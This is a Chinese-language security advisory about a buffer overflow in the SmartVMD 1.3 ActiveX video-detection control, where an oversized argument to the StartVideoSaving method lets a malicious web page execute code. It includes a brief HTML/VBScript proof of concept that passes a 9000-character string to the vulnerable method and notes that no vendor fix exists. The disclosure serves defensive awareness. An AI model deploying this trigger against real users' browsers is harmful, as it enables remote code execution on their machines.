漏洞起因
边界条件错误
影响系统
SmartVMD 1.3
不受影响系统
危害
远程攻击者可以利用漏洞以应用程序权限执行任意指令。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户打开。
漏洞信息
SmartVMD是一款应用于视频动态侦测(VMD)的ActiveX控件。
SmartVMD ActiveX控件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
问题是’VideoMovementDetection.dll’控件对StartVideoSaving方法的参数缺少充分边界检查,构建恶意WEB页,诱使用户打开,可导致以应用程序权限执行任意指令。
测试方法
<object classid='clsid:E3462D53-47A6-11D8-8EF6-DAE89272743C'
id='test'></object>
<input language=VBScript onclick=aidi() type=button value='test'>
<script language='vbscript'>
Sub aidi
buff = String (9000, "a")
test.StartVideoSaving (buff)
End Sub
</script>
厂商解决方案
目前没有详细解决方案提供:
http://www.smartvmd.com/
0 条评论。